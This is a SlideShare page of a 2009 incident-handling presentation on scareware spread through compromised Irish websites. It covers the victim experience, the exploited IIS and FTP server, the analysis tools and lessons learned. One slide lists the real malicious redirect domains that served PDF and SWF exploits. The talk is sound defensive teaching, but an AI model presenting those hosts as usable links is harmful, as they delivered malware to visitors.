Scare Ware From Ireland

1,020 views

Published on

Presentation at the 2009 IRISS Cyber Crime conference on how Irish websites were compromised to host malicious software

Published in: Technology, Business
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,020
On SlideShare
0
From Embeds
0
Number of Embeds
13
Actions
Shares
0
Downloads
7
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Scare Ware From Ireland

  1. 1. Scareware From Ireland Mark Hillick IrissCert I id t H dl I i C t Incident Handler http://www.iriss.ie mark.hillick@iriss.ie Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 1
  2. 2. What is Scareware? Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 2
  3. 3. Irish Scareware Exploit Browse to Irish website & collect your fake anti- virus Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 3
  4. 4. Dialog box fun Dialog-box fun….. Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 4
  5. 5. Dialog box Dialog-box fun cont cont….. Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 5
  6. 6. System Scan Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 6
  7. 7. Trojan Log file Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 7
  8. 8. Money, Money please! Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 8
  9. 9. Are you sure? Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 9
  10. 10. Are you mad???? Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 10
  11. 11. BSOD Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 11
  12. 12. Effect on the end-user end user…. Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 12
  13. 13. Exploit  Exploited Sites hosted on one server  Microsoft FTPd & IIS 6.0 60 Two most popular web site attacks –  Gumblar PHP Sites  Asprox SQL Injection Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 13
  14. 14. Pass the Parcel http://compromisedsite.ie  http://jobstopfil.biz http://poppka.net  htt // j tli http://sujetline.ru  http://grownclubfest.ru ttp //g o c ub est u  PDF & SWF files served back Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 14
  15. 15. Obfuscation Engaged SANS ISC Malware Team  Heavily obfuscated javascript  Used techniques not seen before Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 15
  16. 16. Complex Design…. Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 16
  17. 17. Tools Used Tamper Data, Live HTTP Headers – Firefox Burp Suite Tcpdump, Tcpdump Wireshark & Netwitness Dig/nslookup Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 17
  18. 18. Incident Handling - Containment Source: http://www.tazworld.co.uk/gallery/pictures/www.tazworld.co.uk_taz_035.gif p // /g y/p / g © Warner Bros. Entertainment Inc. Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 18
  19. 19. Incident Handling - Eradication Source -> http://www.alexross.com/CJ011.jpg © Warner Bros. Entertainment Inc Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 19
  20. 20. Incident Handling - Recovery Dilbert ©2009, United Feature Syndicate, Inc. Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 20
  21. 21. Incident Handling - Lessons Learned Patch web-server & application  Input validation p Close unnecessary open ports (e g FTP) (e.g. Password Policy Regular back-ups Web-app security testing Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 21
  22. 22. Securing the Desktop End-User Defence Rescue CDs  Google -> “rescue site:raymond cc” > rescue site:raymond.cc Free Tools  http://zeltser.com/fighting-malicious-software/ Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 22
  23. 23. Next Steps & Extra Info Sans GCIH Gold Paper  Scareware & its evolution  Incident Handling Process  Full Incident Report  http://www.iriss.ie – in shared documents  http://www.hillick.net/things/scareware.doc http://www hillick net/things/scareware doc Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 23
  24. 24. References  Sunbelt Blog  Dancho Danchev Blog  SANS ISC (Thanks to @bojanz)  VRT-Sourcefire Blog  Symantec White Papers  Sans Forensics Blog Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 24
  25. 25. That s it..... That's it Hat Tip for image - Jesse M. Heines - http://teaching.cs.uml.edu/~heines/images/questions.gif Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS 25

×